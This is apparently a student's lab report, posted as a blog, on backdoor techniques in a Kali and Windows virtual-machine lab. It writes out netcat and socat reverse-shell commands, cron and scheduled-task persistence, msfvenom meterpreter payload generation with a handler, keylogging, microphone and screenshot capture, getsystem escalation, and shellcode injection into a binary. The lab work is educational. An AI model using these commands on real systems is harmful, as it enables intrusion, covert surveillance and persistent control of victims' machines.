步骤1:实验环境准备 配置Kali Linux(32位)与Windows 10(64位)两台虚拟机,查询IP分别为192.168.206.128和192.168.206.129。在Windows上关闭防火墙和实时防护,并安装好netcat与socat工具,确保两台主机可以互相Ping通。
步骤2:使用Netcat获取Shell并配置Cron
在Windows端运行命令.\nc64.exe -l -p 2416监听端口,在Linux端运行ncat 192.168.206.129 2416 -e /bin/sh连接,成功获取Linux Shell。随后在获取的Shell中输入命令echo "* * * * * echo \"2023112113text\" > /home/kali/2023112113.txt" >/var/spool/cron/crontabs/root,将周期性任务写入root文件。使用crontab -l查看配置,并重启crontab服务,验证每分钟自动生成文本文件成功。
步骤3:使用Socat获取Shell并配置任务计划
在Linux端运行nc -l -p 2416监听,在Windows端运行socat.exe tcp-connect:192.168.206.129:2416 exec:cmd.exe,pty,stderr反向连接Linux。成功获取Shell后,使用schtasks /create /tn "2023112113test" /tr "程序路径" /sc minute创建名为“2023112113test”的任务计划,设置每分钟运行一次。通过观察程序启动情况,验证任务计划执行成功。
步骤4:使用MSF生成后门并获取Shell
在Kali终端使用msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.206.128 LPORT=2416 -f exe > 2023112113_backdoor.exe生成后门文件。由于ncat传输存在问题,改用socat在Windows端监听接收文件。文件传输完成后,在Kali启动MSF控制台,配置use exploit/multi/handler,设置payload为windows/meterpreter/reverse_tcp,LHOST和LPORT分别为本机IP和2416端口。运行exploit开始监听,在Windows端运行后门文件,成功建立Meterpreter会话。
步骤5:利用Meterpreter获取信息与提权
在Meterpreter会话中,输入record_mic获取音频内容;输入webcam_snap尝试获取摄像头(因权限问题失败);输入keyscan_start和keyscan_dump记录并读取Windows端的键盘输入;输入screenshot获取屏幕截图;输入getsystem尝试提权,最终成功获取SYSTEM权限,完成信息收集与提权操作。
步骤6:MSF生成Shellcode并注入
将之前的pwn1文件重命名为“2023112113pwnb”。使用命令msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.206.128 LPORT=2416 -x /home/kali/Desktop/2023112113pwnb -f elf > 2023112113pwnb_injected将Shellcode注入文件。开启MSF监听Linux反弹连接,在另一个终端运行注入后的文件,观察到MSF成功连接,输入ls和ifconfig验证可以执行命令并查看主机信息,实验完成。
实验结果 本次实验成功搭建了Kali与Windows的攻防环境。利用Netcat和Socat均实现了跨平台的Shell获取,验证了底层网络工具的强大功能。通过Cron和Windows任务计划程序,成功实现了后门程序的持久化自启动。使用MSF生成的后门文件顺利绕过防护建立连接,并成功获取了目标主机的音频、键盘记录和屏幕截图等敏感数据,同时通过getsystem命令完成了从普通权限到SYSTEM权限的提升。最后,Shellcode注入实验也成功建立了反弹Shell,所有预定目标均达成。
个人收获 通过本次实验,我深刻理解了后门技术的原理与危害,特别是持久化机制(如计划任务)在实际攻击中的应用。我熟练掌握了MSF框架中msfvenom和exploit/multi/handler的配合使用,体会到了自动化攻击工具的高效性。在实验过程中,遇到防火墙阻断、文件传输损坏(ncat问题)以及依赖库缺失(socat需cygwin)等问题,通过查阅资料和调试解决,极大地锻炼了我的排错能力和对网络底层传输细节的理解。这次实验不仅提升了技术技能,也让我更加意识到系统安全防护的重要性。
本文作者:Linxiong
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!